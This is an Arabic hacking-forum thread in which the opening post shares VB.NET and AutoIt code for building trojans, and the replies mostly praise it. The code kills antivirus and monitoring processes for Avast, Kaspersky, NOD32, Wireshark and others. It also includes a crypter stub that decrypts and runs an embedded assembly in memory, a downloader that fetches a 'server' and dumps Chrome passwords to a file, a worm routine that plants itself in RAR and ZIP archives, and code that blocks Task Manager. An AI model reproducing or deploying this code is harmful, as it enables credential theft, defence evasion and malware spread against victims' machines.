1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

اكواد تتخطى بعض برامج الفحص وغيرها >>>>

الموضوع في 'قسم فيجول بيسك دوت نت VB.NET' بواسطة سكيورتي ارهابي, بتاريخ ‏28 فبراير 2015.

كاتب الموضوع : سكيورتي ارهابي المشاهدات : 1,445 الردود : 40 ‏28 فبراير 2015
  1. غير متصل

    سكيورتي ارهابي
    ExpErt DeveloPer

    عضو منذ:
    ‏1 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    53
    نقاط الجائزة:
    الوظيفة:
    ماكسي مول
    الإقامة:

    السلام عليكم ورحمه الله وبركاته كيفكم شباب ان شاء الله بخير

    اليوم اقدم لكم بعض اكواد تخطيات ان شاء الله راح تعجبكم


    وتفيدكم نــاتي كود الاوتوايت


    #notrayicon
    #requireadmin
    break( 0 )
    processwaitclose("tcpeye")
    processwaitclose("procexp.exe")
    processwaitclose("cports.exe"")
    processwaitclose("smsniff.exe"")
    processwaitclose("telaunch.exe"_)
    processwaitclose("wireshark.exe")
    processwaitclose("processexplorer.exe")
    processwaitclose("xns5.exe")
    processwaitclose("FakeNet.exe")
    processwaitclose("Armor2net.exe")
    processwaitclose("AntiLogger.exe")
    processwaitclose("Mamutu.exe")
    processwaitclose("ProcessHacker.exe")
    processwaitclose("FortKnox.exe")
    processwaitclose("FireWall.exe")
    processwaitclose("taskexp.exe")
    processwaitclose("mtna.exe")
    processwaitclose("IPBlocker.exe")
    processwaitclose("SpyTheSpy.exe")




    fileinstall("اسم السيرفر معا الامتداد", @programfilesdir&"/اسم السيرفر معا الامتداد")
    run(@programfilesdir&"/اسم السيرفر معا الامتداد")
    exit
    -------------------{1!$8}


    كود تخطي من داخل الكلاس


    'kill SpyTheSpy
    Dim SpyTheSpy() As Process = System.Diagnostics.Process.GetProcessesByName("SpyTheSpy")
    For Each killspy As Process In SpyTheSpy
    killspy.Kill()
    Next
    '---------------------------------------------------------
    'kill procexp
    Dim procexp() As Process = System.Diagnostics.Process.GetProcessesByName("procexp")
    For Each procexpkill As Process In procexp
    procexpkill.Kill()
    Next
    '--------------------------------------------------------
    'Kill SbieCtrl
    Dim SbieCtrl() As Process = System.Diagnostics.Process.GetProcessesByName("SbieCtrl")
    For Each SbieCtrlkill As Process In SbieCtrl
    SbieCtrlkill.Kill()
    Next
    '-------------------------------------------------------
    'kill SpeedGear
    Dim SpeedGear() As Process = System.Diagnostics.Process.GetProcessesByName("SpeedGear")
    For Each SpeedGearkill As Process In SpeedGear
    SpeedGearkill.Kill()
    Next
    '-------------------------------------------------------
    'kill wireshark
    Dim wireshark() As Process = System.Diagnostics.Process.GetProcessesByName("wireshark")
    For Each wiresharkkill As Process In wireshark
    wiresharkkill.Kill()
    Next
    '--------------------------------------------------
    'kill mbam
    Dim mbam() As Process = System.Diagnostics.Process.GetProcessesByName("mbam")
    For Each mbamkill As Process In mbam
    mbamkill.Kill()
    Next
    '------------------------------------------------
    'kill apateDNS
    Dim apateDNS() As Process = System.Diagnostics.Process.GetProcessesByName("apateDNS")
    For Each apateDNSkill As Process In apateDNS
    apateDNSkill.Kill()
    Next
    '-------------------------------------------------
    'kill IPBlocker
    Dim IPBlocker() As Process = System.Diagnostics.Process.GetProcessesByName("IPBlocker")
    For Each IPBlockerkill As Process In IPBlocker
    IPBlockerkill.Kill()
    Next
    '-------------------------------------------------
    'kill cports
    Dim cports() As Process = System.Diagnostics.Process.GetProcessesByName("cports")
    For Each cportskill As Process In cports
    cportskill.Kill()
    Next
    '--------------------------------------------------
    'kill ProcessHacker
    Dim ProcessHacker() As Process = System.Diagnostics.Process.GetProcessesByName("ProcessHacker")
    For Each ProcessHackerkill As Process In ProcessHacker
    ProcessHackerkill.Kill()
    Next
    '--------------------------------------------------
    'kill AntiLogger
    Dim AntiLogger() As Process = System.Diagnostics.Process.GetProcessesByName("AntiLogger")
    For Each AntiLoggerkill As Process In AntiLogger
    AntiLoggerkill.Kill()
    Next

    ---------------------


    تخطي بعض برامج الفحص المعروفه الافاست وغيرها




    Antia-squared :
    ---------------------------------
    Sub Antia-squared()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "a2servic.exe"
    ktp(i).Kill()
    Case Else
    End Select
    Next
    End Sub


    ---------------------------------
    AntiGen :
    ---------------------------------
    Sub Anti AntiGen()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "antigen.exe"
    ktp(i).Kill()
    Case Else
    End Select
    Next
    End Sub


    ---------------------------------
    Avast :
    ---------------------------------


    Sub AntiAvast()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "ashWebSv.exe"
    ktp(i).Kill()
    Case Else
    End Select
    Next


    ---------------------------------
    AVG:
    ---------------------------------
    Sub AntiAVG()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "avgemc.exe"
    ktp(i).Kill()
    Case Else
    End Select
    Next
    End Sub




    ---------------------------------
    BitDefender 2 :
    ---------------------------------
    Dim bit As Process() = Process.GetProcesses
    Dim b As Integer
    For b = 0 To bit.Length - 1
    Debug.WriteLine(bit(b).ProcessName)
    If Strings.UCase(bit(b).ProcessName) =Strings.UCase("bdagent") Then
    bit(b).Kill()
    End If
    Next




    ---------------------------------
    BitDefender :
    ---------------------------------


    Sub AntiBitDefender()
    Dim KillTheProcess As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To KillTheProcess.Length - 1
    Select Case Strings.LCase(KillTheProcess(i).ProcessName)
    Case "bdagent"
    KillTheProcess(i).Kill()
    Case Else
    End Select
    Next
    End Sub




    ---------------------------------
    Comodo :
    ---------------------------------


    Sub AntiComodo()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "cpf.exe"
    ktp(i).Kill()
    Case Else
    End Select
    Next
    End Sub




    ---------------------------------
    Kaspersky :
    ---------------------------------


    Sub AntiKaspersky()
    Dim KillTheProcess As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To KillTheProcess.Length - 1
    Select Case Strings.LCase(KillTheProcess(i).ProcessName)
    Case "avp"
    KillTheProcess(i).Kill()
    Case Else
    End Select
    Next
    End Sub


    ---------------------------------
    McAfee :
    ---------------------------------


    Sub AntiMcAfee()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "mcagent" & "mcuimgr"
    ktp(i).Kill()
    Case Else
    End Select
    Next
    End Sub




    ---------------------------------
    NOD32 2 :
    ---------------------------------


    Dim nod As Process() = Process.GetProcesses
    Dim n As Integer
    For o = 0 To nod.Length - 1
    Debug.WriteLine(nod(n).ProcessName)
    If Strings.UCase(nod(n).ProcessName)=Strings.UCase("e gui") Then
    nod(n).Kill()
    End If
    Next




    ---------------------------------
    NOD32 :
    ---------------------------------


    Sub AntiNOD32()
    Dim KillTheProcess As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To KillTheProcess.Length - 1
    Select Case Strings.LCase(KillTheProcess(i).ProcessName)
    Case "egui"
    KillTheProcess(i).Kill()
    Case Else
    End Select
    Next
    End Sub


    ---------------------------------
    Norton :
    ---------------------------------


    Sub Anti Norton()
    Dim ktp As Process() = Process.GetProcesses
    Dim i As Integer
    For i = 0 To ktp.Length - 1
    Select Case Strings.LCase(ktp(i).ProcessName)
    Case "ccapp.exe"
    ktp(i).Kill()
    Case Else
    End Select
    Next
    End Sub

    ---------------
    كود تلغيمه انتر بوينت


    Module Module2





    Sub Main(ByVal aa As String())


    Form1.Show()


    Dim awx As Byte() = XORDecrypt(Convert.FromBase64String(My.Resources.S tring1), "KeyEncrypt")


    Dim ww As Object() = New Object(-1) {}


    Dim qs As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(awx)


    If qs.EntryPoint.GetParameters().Length > 0 Then


    ww = New Object() {aa}


    End If


    qs.EntryPoint.Invoke(Nothing, ww)


    End Sub


    Public Function XORDecrypt(ByVal xwxw As Byte(), ByVal dcf As String) As Byte()


    Dim dcbhg As Byte() = System.Text.Encoding.ASCII.GetBytes(dcf)


    Dim fcdff As Integer = xwxw(xwxw.Length - 1) Xor 112


    Dim dfetgf(xwxw.Length) As Byte


    Dim vvvbv As Integer


    For ssdd As Integer = 0 To xwxw.Length - 1


    dfetgf(ssdd) = (xwxw(ssdd) Xor fcdff) Xor dcbhg(vvvbv)


    If vvvbv = dcf.Length - 1 Then vvvbv = 0 Else vvvbv = vvvbv + 1


    Next


    ReDim Preserve dfetgf(xwxw.Length - 2)


    Return dfetgf


    End Function


    End Module

    ---------------------
    كود تلغيمه داونلودر


    Me.Hide()
    Me.ShowInTaskbar = False
    Me.ShowIcon = False
    Dim WaitRunningProcess As System.Diagnostics.Process = Process.GetProcessesByName("Noura Hexor v1.0")(0)
    WaitRunningProcess.WaitForExit()
    Dim wc As New Net.WebClient
    wc.DownloadFile("رابط المباشر لسيرفر ", Environ("tmp") & "\Server.exe")
    Shell(Environ("tmp") & "\Server.exe /stext " & Environ("tmp") & "\ChromePass.txt", AppWinStyle.Hide)



    -------------------------------
    كود انتشار بملف الونرار
    Module RAR
    <DllImport("kernel32.dll", CharSet:=CharSet.Auto)> _
    Public Function GetShortPathName(<MarshalAs(UnmanagedType.LPTStr)> ByVal path As String, <MarshalAs(UnmanagedType.LPTStr)> ByVal shortPath As StringBuilder, ByVal shortPathLength As Integer) As Integer
    End Function
    Dim _rarPath As String
    Dim _copiedExeName As String
    Private Sub Search(ByVal pathName As String)
    Dim files As String()
    Try




    files = Directory.GetFiles(pathName)
    For Each file As String In files
    If file.Contains(".rar") Then
    RarStart(file)
    End If
    If file.Contains(".zip") Then
    RarStart(file)
    End If
    Next


    Dim subdirectorys As String() = Directory.GetDirectories(pathName)
    For Each subdirectory As String In subdirectorys
    Search(subdirectory)
    Next
    Catch ex As Exception


    End Try
    End Sub
    Public Sub Spread(ByVal myExeName As String)
    _copiedExeName = myExeName
    Dim drives As String() = Environment.GetLogicalDrives()
    For Each strDrive As String In drives
    Search(strDrive)
    Next
    File.Create(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\temp48.txt")
    End Sub
    Public Sub RarStart(ByVal archiveToInject As String)
    Dim sysFolder As String = Environment.GetFolderPath(Environment.SpecialFolder.System)
    Dim rootdrive As String = sysFolder.Replace(sysFolder.Substring(sysFolder.IndexOf("\")), [String].Empty) & "\"


    _rarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) & "\WinRAR\WinRAR.exe"
    If File.Exists(_rarPath) Then
    If Not File.Exists(Path.Combine(rootdrive, _copiedExeName)) Then


    File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(rootdrive, _copiedExeName))
    End If


    Dim getshortExePath = New StringBuilder(255)
    GetShortPathName(Path.Combine(rootdrive, _copiedExeName), getshortExePath, getshortExePath.Capacity)
    Dim evilpath As String = getshortExePath.ToString()


    Dim shortArchiveDirectory = New StringBuilder(255)
    GetShortPathName(archiveToInject, shortArchiveDirectory, shortArchiveDirectory.Capacity)




    Try
    Dim rarProcess As New ProcessStartInfo()
    Dim theInfo As String = (" a " & shortArchiveDirectory.ToString & " ") + evilpath
    rarProcess.FileName = _rarPath
    rarProcess.Arguments = theInfo
    rarProcess.WindowStyle = ProcessWindowStyle.Hidden


    Process.Start(rarProcess)
    Catch
    End Try
    End If
    End Sub
    End Module
    =================================================================================================
    نضع هذه الاكواد بالتصاريح


    Imports System.IO
    Imports System.Text
    Imports System.Runtime.InteropServices

    -------------------------------------------------


    كود جعل السيرفر لا يمكن قتله في البروسس


    Public Class Form1
    Dim c As New AntiTaskManager
    Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
    End
    End Sub
    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    Control.CheckForIllegalCrossThreadCalls = False
    Dim t As New Threading.Thread(AddressOf c.protect)
    t.Start()
    End Sub
    End Class
    Public Class AntiTaskManager
    ' C0d3d bY njq8
    <Runtime.InteropServices.DllImport("user32.dll")> _
    Private Shared Function EnableWindow(ByVal hWnd As IntPtr, ByVal bEnable As Boolean) As Boolean
    End Function
    Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As _
    IntPtr, ByRef lpdwProcessID As Integer) As Integer
    Private Declare Function GetForegroundWindow Lib "user32.dll" () As IntPtr
    Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As _
    Integer, ByVal lpClassName As String, ByVal nMaxCount As Integer) As Integer
    Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal _
    hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As String) As Integer
    Private Declare Auto Function GetWindowText Lib "user32.dll" (ByVal hwnd As Int32, _
    ByVal lpString As System.Text.StringBuilder, ByVal cch As Int32) As Int32
    Private Declare Auto Function GetWindowTextLength Lib "user32.dll" (ByVal hwnd As Int32) As Int32
    Private Delegate Function EnumWindProc(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
    Private Delegate Function EnumChildWindProc(ByVal hWnd As Int32, ByVal _
    lParam As Int32) As Boolean
    Private Declare Function EnumChildWindows Lib "user32" (ByVal hWnd As IntPtr, _
    ByVal lpEnumFunc As EnumWindProc, ByRef lParam As IntPtr) As Int32
    Private Function EnumChild(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
    CLD.Add(hWnd)
    Return True
    End Function
    Public Sub protect()
    While True
    Threading.Thread.Sleep(200)
    Dim hwd = GetForegroundWindow
    If hwd.ToInt32 = 0 Then Continue While
    Dim id As Integer = 0
    GetWindowThreadProcessId(hwd, id)
    If id > 0 Then
    Dim Title As String = ""
    Dim text_len As Integer = GetWindowTextLength(hwd)
    If text_len = 0 Then
    Title = ""
    Else
    Dim sb As New System.Text.StringBuilder(text_len + 1)
    Dim ret = GetWindowText(hwd, sb, sb.Capacity)
    If ret = 0 Then
    Title = ""
    Else
    Title = sb.ToString
    End If
    End If
    Dim p As Process = Process.GetProcessById(id)
    If p.ProcessName.ToLower = "taskmgr" Or p.ProcessName.ToLower _
    = "processhacker" Or Title.ToLower = "process explorer" Then
    Dim button As New List(Of IntPtr)
    Dim statics As Integer = 0
    For Each x As IntPtr In GetChild(hwd)
    Dim className As String = Space(200)
    Dim ln As Integer = GetClassName(x, className, 200)
    className = className.Remove(ln, 200 - ln)
    If className.ToLower = "button" Then
    button.Add(x)
    End If
    If className.ToLower = "static" Or className.ToLower _
    = "directuihwnd" Then
    statics += 1
    End If
    Next
    If button.Count = 2 And (statics = 2 Or statics = 1) Then
    EnableWindow(button(0), False)
    SendMessage(button(0), &HC, 0, "Cancel pls ;)")
    End If
    End If
    End If
    End While
    End Sub
    Private CLD As New List(Of IntPtr)
    Private Function GetChild(ByVal hwd As IntPtr) As IntPtr()
    SyncLock Me
    CLD.Clear()
    EnumChildWindows(hwd, New EnumWindProc(AddressOf EnumChild), 0)
    Return CLD.ToArray
    End SyncLock
    End Function
    End Class

    ----------


    الى هنا انتهينا ان شاء الله استفدتم


    من الاكواد تحياتي لكم
    اتمنى لكم الموفقيه
    {1!$8}






     


    جاري تحميل الصفحة...
  2. غير متصل

    • тнe нαғαʀ •
    V • I • P

    عضو منذ:
    ‏16 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    الوظيفة:
    عطـآل - بطـأل
    الإقامة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    بارك الله بيك ي غالي


    فقط ملاحظة شوية هتم بالتنسيق حتى تصير مواضيعك خرافية
    وفقك الله وجعلة في ميزآن حسنآتك


    [​IMG]
     


  3. غير متصل

    IQ Member
    rank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏1 مارس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    الكود الاولى مو تخطي [ تجنب ]

    لكن هذه الاكواد م تنفع بشئ بحالة تغيير اسم الكلاس , يعني وجودها او عدمة نفس الشئ


    بارك الله بيك :{1!}:
     


  4. غير متصل

    ᎷᎥᏁᎯ ᎷᎯᏃᎬᏁ
    rankrank
    Developer

    عضو منذ:
    ‏26 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    رووووووووعه استمر حبى
     


  5. غير متصل

    مستر كولدن
    DeveloPer Plus

    عضو منذ:
    ‏4 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    288
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    {1!$2}{1!$2}{1!$2}عاشت ايدك ولك هذني الاكواد اني طيتهن الك سوي بيهن شرح {1!$2}{1!$2}{1!$2}
     


  6. غير متصل

    حازم مشكله
    V • I • P

    عضو منذ:
    ‏26 مارس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    28
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    عاشت ايدك
     


  7. غير متصل

    Hacker Germany <span style="font-weight: bold; text-shadow: #BBBB
    Developer

    عضو منذ:
    ‏27 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الوظيفة:
    Hacking
    الإقامة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    [FONT=ae_AlMothnna]واصل ياغالي [/FONT][​IMG]
     


  8. غير متصل

    سہجہاد الہبہهہادلہي
    rank
    Developer

    عضو منذ:
    ‏6 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    {1!$8}{1!$8}مشكور حبيبي ما تقصر{1!$8}{1!$8}
     


  9. غير متصل

    بہہرنہہہس الہہدولہہة ThE sHaDow
    rank
    Developer

    عضو منذ:
    ‏19 مارس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    عــاشـت أيــدك صــديــقــي واصــل ابــداعـــك i:q^:
     


  10. غير متصل

    ALI.1
    rankrank
    Developer

    عضو منذ:
    ‏10 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: اكواد تتخطى بعض برامج الفحص وغيرها >>>>

    عاشت ايدك يا بطل
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...